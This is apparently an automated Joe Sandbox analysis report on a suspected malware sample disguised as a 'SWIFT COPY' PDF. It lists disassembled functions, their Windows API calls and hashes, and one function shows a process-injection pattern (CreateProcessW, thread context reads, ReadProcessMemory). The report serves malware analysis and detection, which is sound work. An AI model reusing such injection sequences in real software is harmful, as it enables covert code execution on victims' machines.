                                                                                    • Instruction ID: 13fcf4b41d5665aee5bd5ca678e80903d3feeab29be133e90c6da44c00bab7fc
                                                                                    • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                    • Instruction Fuzzy Hash: 60E05BA175174147DA3465796E84FB313CC4F45352714081DB49DE7146FF24F8C085B4
                                                                                    Function 00922322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 009222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009224F1), ref: 00922303
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009225A1
                                                                                    • CoInitialize.OLE32(00000000), ref: 00922618
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0099503A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3815369404-0
                                                                                    • Opcode ID: 09834a7f9a8de82e0c104345b2f0e59139d767aafaa01b05c7e8787e6dadbe33
                                                                                    • Instruction ID: d580131f039f83fb02ffcc28eb71481a46d6523362e6de1c3efcc2be4c4f297d
                                                                                    • Opcode Fuzzy Hash: 09834a7f9a8de82e0c104345b2f0e59139d767aafaa01b05c7e8787e6dadbe33
                                                                                    • Instruction Fuzzy Hash: FD719CB49293C18BC715EF6AADD0599BBE8BB99344780416EE229CF7B1DB304C40EF15
                                                                                    Function 00980828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _strcat.LIBCMT ref: 009808FD
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • _wcscpy.LIBCMT ref: 0098098C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1012013722-0
                                                                                    • Opcode ID: 192ec0580935e304b02b3e95c49df6b18e7466b34e50dce1343e071cd790a26c
                                                                                    • Instruction ID: c6f9b69c939d0162639b130dc16e2592ddb95d08d13a3ae52868b8e792060dd2
                                                                                    • Opcode Fuzzy Hash: 192ec0580935e304b02b3e95c49df6b18e7466b34e50dce1343e071cd790a26c
                                                                                    • Instruction Fuzzy Hash: 88915835A00614DFCB58EF28D495AA9B7E5FF89310B51846DE81A8F3A6DB30ED45CF80
                                                                                    Function 00923A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsThemeActive.UXTHEME ref: 00923A73
                                                                                      • Part of subcall function 00941405: __lock.LIBCMT ref: 0094140B
                                                                                      • Part of subcall function 00923ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00923AF3
                                                                                      • Part of subcall function 00923ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00923B08
                                                                                      • Part of subcall function 00923D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00923AA3,?), ref: 00923D45
                                                                                      • Part of subcall function 00923D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00923AA3,?), ref: 00923D57
                                                                                      • Part of subcall function 00923D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,009E1148,009E1130,?,?,?,?,00923AA3,?), ref: 00923DC8
                                                                                      • Part of subcall function 00923D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00923AA3,?), ref: 00923E48
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00923AB3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                    • String ID:
                                                                                    • API String ID: 924797094-0
                                                                                    • Opcode ID: feb6c576b2bf118403c0a9a38a4349d4401a40470373c1fe9db88b16978d7948
                                                                                    • Instruction ID: 451d99444730ee9d0a97285b63eb168077494f0aa45727e0f53f9f8ce3202f2a
                                                                                    • Opcode Fuzzy Hash: feb6c576b2bf118403c0a9a38a4349d4401a40470373c1fe9db88b16978d7948
                                                                                    • Instruction Fuzzy Hash: 5B11937151C3819BC700EF55E845A1EBBE8EFD5710F00891EF485872B1DB709A84DF92
                                                                                    Function 0094E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___lock_fhandle.LIBCMT ref: 0094EA29
                                                                                    • __close_nolock.LIBCMT ref: 0094EA42
                                                                                      • Part of subcall function 00947BDA: __getptd_noexit.LIBCMT ref: 00947BDA
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                    • String ID:
                                                                                    • API String ID: 1046115767-0
                                                                                    • Opcode ID: 284ddbb5257c16e5e25bcb5c4f9c8021a2edb63eea0b426281544a74c127cda5
                                                                                    • Instruction ID: 0874cfd96906c0e8bd35fc37cf1af42afcd14d16acc1f9e4f610950a0fbcb7ed
                                                                                    • Opcode Fuzzy Hash: 284ddbb5257c16e5e25bcb5c4f9c8021a2edb63eea0b426281544a74c127cda5
                                                                                    • Instruction Fuzzy Hash: FB11A572819A548BD711BFA4C881F597A61BFC2335F264740E4605F2E3DBB48C4097A5
                                                                                    Function 0093F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0094395C: __FF_MSGBANNER.LIBCMT ref: 00943973
                                                                                      • Part of subcall function 0094395C: __NMSG_WRITE.LIBCMT ref: 0094397A
                                                                                      • Part of subcall function 0094395C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,00000001,00000000,?,?,0093F507,?,0000000E), ref: 0094399F
                                                                                    • std::exception::exception.LIBCMT ref: 0093F51E
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0093F533
                                                                                      • Part of subcall function 00946805: RaiseException.KERNEL32(?,?,0000000E,009D6A30,?,?,?,0093F538,0000000E,009D6A30,?,00000001), ref: 00946856
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3902256705-0
                                                                                    • Opcode ID: 7fa2812fe604bf32e299124b9e64e4c47d6025d03337569cfa14ae35048ea217
                                                                                    • Instruction ID: 419114f1efa21db5e35fdef0c5b4bb78a9f19cb30048c7d2d1f6680d92408e18
                                                                                    • Opcode Fuzzy Hash: 7fa2812fe604bf32e299124b9e64e4c47d6025d03337569cfa14ae35048ea217
                                                                                    • Instruction Fuzzy Hash: 22F0F47150031EA7D714BF98D815EEE77EC9F42314F20402AF90992191CBB096408AE5
                                                                                    Function 009435E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • __lock_file.LIBCMT ref: 00943629
                                                                                      • Part of subcall function 00944E1C: __lock.LIBCMT ref: 00944E3F
                                                                                    • __fclose_nolock.LIBCMT ref: 00943634
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 91bafabf7cb4544acd36c30c385244abb0d26c1cfee99d6d3657adb1cc5a66c6
                                                                                    • Instruction ID: 03a97d523b38664bfb8dbc0c5ce1da1470e535710e570d32d0a350abc6d59f12
                                                                                    • Opcode Fuzzy Hash: 91bafabf7cb4544acd36c30c385244abb0d26c1cfee99d6d3657adb1cc5a66c6
                                                                                    • Instruction Fuzzy Hash: 4BF0B471801605AADB117F758807F6EBAE46F81334F26C109E465AB2C1CB7C8A019F56
                                                                                    Function 01026185 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01026943
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010269D9
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010269FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                    • Instruction ID: f599501d48a481f00e93a7ce34e1f18186828a76006cf619fe8807c6b7f8da98
                                                                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                    • Instruction Fuzzy Hash: F912DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9D10DEB7A5E77A4E81CB5A
                                                                                    Function 00942957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __flush.LIBCMT ref: 00942A0B
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __flush__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 4101623367-0
                                                                                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                    • Instruction ID: 26ec525943e37f8476360fda0083ff82b3770080afcdaa2240737790c04f9e66
                                                                                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                    • Instruction Fuzzy Hash: F04183716007069FDF288FA9C981DAE7BAABF84360F64892DF855C7284EB74DD418B40
                                                                                    Function 0093ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: 66fd3e0980b132a7dc94312fe8cbf2a365077d53897b10435f481e3254d87c33
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: 7231B274A001059BD718DF58C480A69FBAAFF49340F648AA5E42ADB2D6DB35EDC1CF90
                                                                                    Function 0098040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: cd69cc2bfcb0f15d15692f7f93e97c7816aabaa1de55ff7d08be6c2f34ca07be
                                                                                    • Instruction ID: 1e9ee25752a7f157fcdf4f9d4f8040bb2d44cc3d76eb3f44aded1e8f884432fd
                                                                                    • Opcode Fuzzy Hash: cd69cc2bfcb0f15d15692f7f93e97c7816aabaa1de55ff7d08be6c2f34ca07be
                                                                                    • Instruction Fuzzy Hash: 4E318F75204628DFCF01AF11D09076E77B1FFC9320F10888AEA951B396E778A909CF91
                                                                                    Function 00999A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 99dcb853f2ab71486a734298e96a6b6ae3dc12b3d53e4e1c98fb9f2fe29794cc
                                                                                    • Instruction ID: a9396203eca0ef0a1f73fef7ce93b312c43b94b9cdb26d57579108abbb59731a
                                                                                    • Opcode Fuzzy Hash: 99dcb853f2ab71486a734298e96a6b6ae3dc12b3d53e4e1c98fb9f2fe29794cc
                                                                                    • Instruction Fuzzy Hash: 06414C705087518FDB24DF18C494B1ABBE0BF85308F1989ACE99A4B362C776F885CF52
                                                                                    Function 009241A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00924214: FreeLibrary.KERNEL32(00000000,?), ref: 00924247
                                                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009239FE,?,00000001), ref: 009241DB
                                                                                      • Part of subcall function 00924291: FreeLibrary.KERNEL32(00000000), ref: 009242C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Free$Load
                                                                                    • String ID:
                                                                                    • API String ID: 2391024519-0
                                                                                    • Opcode ID: 62161de7e7cca82f7a5fadd5d20537ad3cf55da1c2ed02d537eb84fddb55eea3
                                                                                    • Instruction ID: 778c361e3991623ddcb6d63fc1ef6ebabf62c0cb5f8480e99f89d9ebc76f9d5b
                                                                                    • Opcode Fuzzy Hash: 62161de7e7cca82f7a5fadd5d20537ad3cf55da1c2ed02d537eb84fddb55eea3
                                                                                    • Instruction Fuzzy Hash: CD11E731610226EADF15BB75EC06F9E77E99F80700F108429F5A6AA1C5EA749A019B60
                                                                                    Function 00999B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: b870fb92460d453a1df33067e06a92f06d0d43bcba1867ad84e305ff07edcabc
                                                                                    • Instruction ID: 4c31e7ef198c3a4c3cebf9ab5107020d2ddefb9276c416d544fccc622327763d
                                                                                    • Opcode Fuzzy Hash: b870fb92460d453a1df33067e06a92f06d0d43bcba1867ad84e305ff07edcabc
                                                                                    • Instruction Fuzzy Hash: 032123705087018FDB24DF68C454B2ABBE1BF89304F154968F9AA4B662C736E845CF92
                                                                                    Function 0094AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___lock_fhandle.LIBCMT ref: 0094AFC0
                                                                                      • Part of subcall function 00947BDA: __getptd_noexit.LIBCMT ref: 00947BDA
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                                                    • String ID:
                                                                                    • API String ID: 1144279405-0
                                                                                    • Opcode ID: b37e21f4019d3a05bef903e49f401f32fc102f1c84521af3bdb48d96dcfeb69a
                                                                                    • Instruction ID: ddad1aa5b7949d66b3282db2f45dffc133d71c104046a7cd3a74859266d5576f
                                                                                    • Opcode Fuzzy Hash: b37e21f4019d3a05bef903e49f401f32fc102f1c84521af3bdb48d96dcfeb69a
                                                                                    • Instruction Fuzzy Hash: F511BF728186448BD7126FE48882F6E7B60AFC2336F254640E4745F2E2C7B8CD009BA2
                                                                                    Function 009239DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                    • Instruction ID: 4edce95e8bed440267487046dd873a744712a9358743e8dbd1c88b7de318e5f5
                                                                                    • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                    • Instruction Fuzzy Hash: FF018131400119FECF04EFA4D882DFEBB78AF60304F008029B566971A9EA309A49CB60
                                                                                    Function 00942AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock_file.LIBCMT ref: 00942AED
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2597487223-0
